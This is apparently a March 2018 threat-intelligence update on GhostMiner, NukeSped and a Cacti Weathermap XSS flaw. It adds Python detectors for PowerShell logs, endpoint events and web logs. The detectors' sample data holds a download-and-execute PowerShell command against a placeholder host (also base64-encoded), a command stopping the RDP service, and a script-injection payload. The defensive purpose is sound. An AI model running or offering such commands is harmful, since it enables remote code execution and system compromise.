Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 4th week of March 2018

New Detection Technique – GhostMiner

GhostMiner is a new cryptocurrency mining malware. By the end of March 2018, a new variant of mining malware was detected targeting MSSQL, phpMyAdmin, and Oracle WebLogic servers. The sample uses PowerShell to execute its code entirely in volatile memory and scans the server's processes to detect and stop other miners that may have been running before it executed.

Fileless malware has become more popular in recent years. The malicious code runs directly in main memory without writing any file to disk, where an antivirus engine could detect it.
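Because nothing is written to disk, file scanning will not see this kind of sample, but PowerShell command-line and script-block logging still records what ran, including payloads passed through -EncodedCommand. The following is an added example (not code from the original update) that triages constructed PowerShell command lines for the two behaviours described above: fetching and executing code in memory, and terminating other processes. The regular expressions are this example's own heuristics, the sample lines are constructed, and the host example.invalid is a placeholder.

```python
import base64
import re

# Heuristics chosen for this example (not signatures from the original update):
# markers of code being fetched or executed without touching disk ...
IN_MEMORY_EXEC = re.compile(
    r"\b(?:IEX|Invoke-Expression)\b|DownloadString|DownloadData|FromBase64String"
    r"|\[Reflection\.Assembly\]::Load",
    re.IGNORECASE,
)
# ... and process termination, which the update describes GhostMiner using against rival miners.
PROCESS_KILL = re.compile(r"\bStop-Process\b|\btaskkill\b", re.IGNORECASE)
# PowerShell's -EncodedCommand (also -enc / -e) carries base64 of a UTF-16LE script.
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script):
    """Encode a script the way PowerShell expects for -EncodedCommand (used only to build sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(line):
    """Return the line with any -EncodedCommand payload replaced by its decoded script."""
    def _decode(match):
        try:
            return base64.b64decode(match.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return match.group(0)  # not really base64/UTF-16LE: leave it untouched
    return ENCODED_ARG.sub(_decode, line)


def classify(line):
    """Tag a PowerShell command line (or logged script block) with the behaviours it exhibits."""
    decoded = decode_encoded_command(line)
    tags = []
    if IN_MEMORY_EXEC.search(decoded):
        tags.append("in_memory_execution")
    if PROCESS_KILL.search(decoded):
        tags.append("process_termination")
    # Fileless execution alone is worth a look; combined with killing processes it matches
    # the GhostMiner behaviour described above.
    return {"decoded": decoded, "tags": tags, "suspicious": "in_memory_execution" in tags}


def suspicious_lines(lines):
    """Indices of the lines that classify() marks suspicious."""
    return [i for i, line in enumerate(lines) if classify(line)["suspicious"]]


# Constructed sample command lines (as process-creation logging would record them); not real malware.
SAMPLE_COMMAND_LINES = [
    # Routine administration: no in-memory execution marker.
    "powershell.exe Get-Service | Where-Object { $_.Status -eq 'Running' }",
    # Fileless pattern: fetch a script, run it from memory, then stop rival miners by process name.
    "powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1'); "
    "Get-Process | Where-Object { $_.Name -match 'xmrig|minerd' } | Stop-Process -Force",
    # The same behaviour hidden behind -EncodedCommand.
    "powershell.exe -EncodedCommand " + encode_command(
        "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1'); "
        "taskkill /F /IM xmrig.exe"
    ),
]

if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_COMMAND_LINES):
        result = classify(line)
        print(i, result["tags"], result["decoded"][:80])
```

The decoding step matters more than the pattern list: a rule that only inspects the raw command line misses the third sample entirely, while the same heuristics applied after decoding tag it the same way as the second.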

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, GhostMiner

New Detection Technique – NukeSped

NukeSped is a trojan first observed in the wild in 2014, which the FBI has previously connected to the Sony Pictures Entertainment attack and to North Korea. This particular variant was first seen in early March 2018. The trojan threatens to make your files publicly available unless you follow the hacker's instructions.

The malware first copies itself onto the computer under different covert names (comon32.exe, diskpartmg16.exe, dpnsvr16.exe, expandmn32.exe, hwrcompsvc64.exe, mobsynclm64.exe, rdpshellex32.exe, recdiscm32.exe, taskchg16.exe, taskhosts64.exe). Afterwards, it downloads other malware files, adds itself as a service, disables and stops other relevant services such as termservice (which allows RDP connections), and finally installs iissvr.exe. After these initial steps, NukeSped is capable of uploading files to a C&C server, as well as downloading and running files as announced in the hacker's initial threat.
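The file names, the service installation and the stopped RDP service above are all things endpoint telemetry records, so they can be turned into a hunt. The following is an added example (not code from the original update) that runs that hunt over constructed, simplified process-creation and service-installation records: it matches image names against the list above, flags a service whose binary carries one of those names, and catches "net stop"/"sc stop"/Stop-Service against termservice. The record field names, paths and the service name ExampleSvc are this example's own.

```python
import json
import re
from pathlib import PureWindowsPath

# Covert file names the update attributes to NukeSped, plus the iissvr.exe it installs last.
# Several mimic legitimate Windows binaries, so a hit is a lead to confirm by path and signer, not proof.
NUKESPED_NAMES = {
    "comon32.exe", "diskpartmg16.exe", "dpnsvr16.exe", "expandmn32.exe", "hwrcompsvc64.exe",
    "mobsynclm64.exe", "rdpshellex32.exe", "recdiscm32.exe", "taskchg16.exe", "taskhosts64.exe",
    "iissvr.exe",
}
# The update names termservice (RDP) as a service the trojan stops.
SERVICES_OF_INTEREST = {"termservice"}
# Matches "net stop <svc>", "sc stop <svc>" and "Stop-Service [-Name] <svc>".
SERVICE_STOP = re.compile(
    r"(?:\b(?:net1?|sc)(?:\.exe)?\s+stop|\bStop-Service(?:\s+-Name)?)\s+([\w.-]+)", re.IGNORECASE
)

# Constructed, simplified event records (field names are this example's own, loosely modelled on
# Sysmon/Windows event data; paths and the service name are made up).
SAMPLE_EVENTS_JSON = r"""
[
 {"type": "process_create", "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
 {"type": "process_create", "image": "C:\\Users\\Public\\taskhosts64.exe", "cmdline": "taskhosts64.exe"},
 {"type": "service_install", "image": "C:\\Users\\Public\\taskhosts64.exe", "service": "ExampleSvc"},
 {"type": "process_create", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net stop termservice"},
 {"type": "process_create", "image": "C:\\ProgramData\\iissvr.exe", "cmdline": "iissvr.exe"}
]
"""


def load_sample_events():
    return json.loads(SAMPLE_EVENTS_JSON)


def hunt(events):
    """Return one finding per indicator matched, keyed by the index of the event that produced it."""
    findings = []
    for idx, ev in enumerate(events):
        image = PureWindowsPath(ev.get("image", "")).name.lower()
        if image in NUKESPED_NAMES:
            findings.append({"event": idx, "kind": "known_covert_name", "detail": image})
            if ev.get("type") == "service_install":
                findings.append({"event": idx, "kind": "service_persistence", "detail": ev.get("service", "")})
        match = SERVICE_STOP.search(ev.get("cmdline", ""))
        if match and match.group(1).lower() in SERVICES_OF_INTEREST:
            findings.append({"event": idx, "kind": "service_stopped", "detail": match.group(1).lower()})
    return findings


def nukesped_like(findings):
    """True when the three stages the update describes all appear on the host:
    covert-name execution, service persistence, and stopping a service of interest."""
    kinds = {f["kind"] for f in findings}
    return {"known_covert_name", "service_persistence", "service_stopped"} <= kinds


if __name__ == "__main__":
    results = hunt(load_sample_events())
    for finding in results:
        print(finding)
    print("NukeSped-like sequence:", nukesped_like(results))
```

Name matching alone is noisy (taskhosts64.exe is one character away from a real binary, and legitimate tools stop TermService too); the value is in the combination, which is why nukesped_like() requires all three stages before calling the host out.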

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, NukeSped Variant

New Detection Techniques – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, MSIL/BackdoorAgent
  • System Compromise, Trojan infection, Win32/APosT
  • System Compromise, Trojan infection, NukeSped Variant
  • System Compromise, Trojan infection, MSIL/Balfasz
  • System Compromise, Trojan infection, W32/Luccese Stealer
  • System Compromise, Trojan infection, W32/BD2net Stealer
  • System Compromise, Trojan infection, Win32/Inerino

New Detection Technique – Cacti Weathermap Plugin (CVE-2013-2618)

This is a known vulnerability (CVE-2013-2618) involving cross-site scripting (XSS). It affects editor.php in the Cacti Network Weathermap plugin before version 0.97b, allowing remote attackers to inject arbitrary web script or HTML via the map_title parameter. Despite being identified in 2014, this vulnerability has recently become a trend in CoinMiner malware distribution, particularly on Linux servers. Why such an old exploit is striking again is still unknown, but the answer could be related to the patch lag that occurs in organizations using open-source tools.
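Until the plugin is upgraded, web server logs are the place to look for attempts against editor.php. The following is an added example (not code from the original update) that scans constructed combined-format access log lines, percent-decodes the query string the way the server would, and flags requests to editor.php whose map_title value carries markup or script. The editor.php path and the map_title parameter come from the text above; the plugin directory, the mapname parameter, the addresses, user agents and the payload are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format; only the request line is used.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# Markup or script indicators in a decoded parameter value (heuristic chosen for this example).
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)

# Constructed access log lines. The editor.php path and map_title parameter come from the update text;
# the plugin directory, other query parameters, addresses and user agents are made up.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [26/Mar/2018:10:01:12 +0000] "GET /cacti/plugins/weathermap/editor.php?mapname=demo.conf&map_title=Core+Links HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Mar/2018:10:02:40 +0000] "GET /cacti/plugins/weathermap/editor.php?mapname=demo.conf&map_title=%3Cscript%3Ex%3C%2Fscript%3E HTTP/1.1" 200 5120 "-" "curl/7.58.0"',
    '198.51.100.7 - - [26/Mar/2018:10:03:01 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 2048 "-" "curl/7.58.0"',
]


def inspect_line(line):
    """Return a finding for a request to editor.php whose map_title carries markup, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/editor.php"):
        return None
    # parse_qs percent-decodes and turns '+' into a space, so the check sees what PHP would see.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("map_title", []):
        if MARKUP.search(value):
            return {"client": m.group("client"), "time": m.group("time"),
                    "status": int(m.group("status")), "map_title": value}
    return None


def scan(lines):
    """Findings for every line in a log, in order."""
    return [hit for hit in (inspect_line(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_ACCESS_LOG):
        print(hit)
```

Two caveats a practitioner will want: the status code in a hit tells you whether the server actually processed the request (a 200 on an unpatched editor.php deserves a closer look at what that map now contains), and access logs only record the query string, so parameters sent in a POST body are invisible to this check. The durable fix remains upgrading the plugin to 0.97b or later.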

We've added the following correlation rules as a result of additional recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Cacti Weathermap Plugin RCE (CVE 2013-2618)

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Malicious Download, PS Dropper
  • System Compromise, C&C Communication, Cobalt Group SSL
  • System Compromise, Mobile trojan infection, Trojan-Dropper.AndroidOS.Mwiam

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Delivery & Attack, Malicious website, Phishing activity
  • Exploitation & Installation, Trojan infection, Sharik
  • System Compromise, Backdoor, Bladabindi
  • System Compromise, C&C Communication, Cobalt Group C2 Domain
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Malware infection, Generic
  • System Compromise, Malware RAT, QRat
  • System Compromise, Mobile trojan infection, Android.Trojan.HiddenApp.EN
  • System Compromise, Mobile trojan infection, Hqwar Dropper
  • System Compromise, Mobile trojan infection, Trojan.AndroidOS.Triada.cx
  • System Compromise, Suspicious Behaviour, Suspicious user-agent with dropper behaviour detected
  • System Compromise, Trojan infection, Glupteba
  • System Compromise, Trojan infection, MalDoc
  • System Compromise, Trojan infection, PS/CoinMiner
  • System Compromise, Trojan infection, SmokeLoader
  • System Compromise, Trojan infection, Windows Executable Inbound via TDS